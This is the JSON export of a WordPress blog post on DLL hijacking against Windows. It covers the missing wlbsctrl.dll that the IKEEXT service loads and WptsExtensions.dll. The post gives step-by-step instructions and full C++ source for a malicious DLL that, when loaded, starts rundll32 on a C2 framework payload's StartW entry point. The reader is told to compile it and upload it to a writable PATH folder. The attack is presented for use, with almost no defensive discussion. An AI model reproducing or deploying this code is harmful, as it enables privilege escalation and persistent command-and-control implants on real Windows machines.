{"id":223,"date":"2021-11-13T22:23:00","date_gmt":"2021-11-13T22:23:00","guid":{"rendered":"https:\/\/www.davincivirus.com\/?p=223"},"modified":"2021-11-14T22:25:24","modified_gmt":"2021-11-14T22:25:24","slug":"dll-hijacking","status":"publish","type":"post","link":"https:\/\/www.davincivirus.com\/?p=223","title":{"rendered":"DLL Hijacking"},"content":{"rendered":"\n<p>A DLL hijack is potentially achievable when a directory within the &#8220;standard search order&#8221; is writable by a malicious actor.  The attack is greatly simplified when DLLs are missing on the target system. This occurs in older versions of Microsoft Windows (Vista, 7, and 8) with wlbsctrl.dll. Newer versions of Windows have a similarly predictable issue with the \u201cschedule\u201d service and WptsExtensions.dll.<\/p>\n\n\n\n<h2>Process<\/h2>\n\n\n\n<p>The IKEEXT service attempts to call the &#8220;main&#8221; function in wlbsctrl.dll.  This functionality is not compatible with prevalent C2 framework DLL payloads.  A custom DLL is therefore needed to invoke the &#8220;StartW&#8221; method.  Compile a DLL using a modified version of the code snippet below; provide a correct (1) payload location and (2) unique mutex.  Upload the malicious DLL to the insecure PATH folder. <\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<pre class=\"wp-block-code\" style=\"font-size:10px\"><code>#include &lt;windows.h&gt;\n#include &lt;string&gt;\n#include &lt;iostream&gt;\n#include \"Shlwapi.h\"\n#include \"shlobj.h\"\n#include \"pch.h\"\n\n\nDWORD WINAPI executeProcess(LPVOID lpParam);\nBOOL APIENTRY DllMain(HMODULE hModule,\n\tDWORD  ul_reason_for_call,\n\tLPVOID lpReserved\n)\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\t\texecuteProcess(NULL); \/\/When main is called, go to executeProcess\n\t\tbreak;\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\nDWORD Return1() {\n\treturn 1;\n}\n\n\/\/Spawns a new process\nDWORD WINAPI executeProcess(LPVOID lpParam) {\n\tSTARTUPINFO  info = { 0 };\n\tPROCESS_INFORMATION   processInfo;\n\n\t\/\/Create a uniquely named mutex. \n\tCreateMutexA(0, FALSE, \"Local\\\\<strong><em>&lt;UNIQUE_NAME&gt;<\/em><\/strong>\");\n\tif (GetLastError() == ERROR_ALREADY_EXISTS)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\t\/\/If using as a .dll hijack only use\/manipulate the following code\n\t\t\n\t\tstd::wstring rundllStart = L\"C:\\\\Windows\\\\System32\\\\rundll32.exe <em><strong>C:\\\\Users\\\\Public\\\\&lt;payload.dll&gt;<\/strong><\/em>,StartW\";\n\n\t\t\/\/Spawn the new process\n\t\tBOOL hR = CreateProcess(NULL, (LPWSTR)rundllStart.c_str(), NULL, NULL, TRUE, 0, NULL, NULL, &amp;info, &amp;processInfo);\n\t\tif (hR == 0) {\n\t\t\treturn 1;\n\t\t}\n\t}\n\n\treturn 0;\n}\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>A DLL hijack is potentially achievable when a directory within the &#8220;standard search order&#8221; is writable by a malicious actor.&hellip; <a class=\"read-more\" href=\"https:\/\/www.davincivirus.com\/?p=223\">Continue Reading<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[10],"tags":[],"_links":{"self":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/223"}],"collection":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=223"}],"version-history":[{"count":2,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/223\/revisions"}],"predecessor-version":[{"id":225,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/223\/revisions\/225"}],"wp:attachment":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=223"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=223"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=223"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}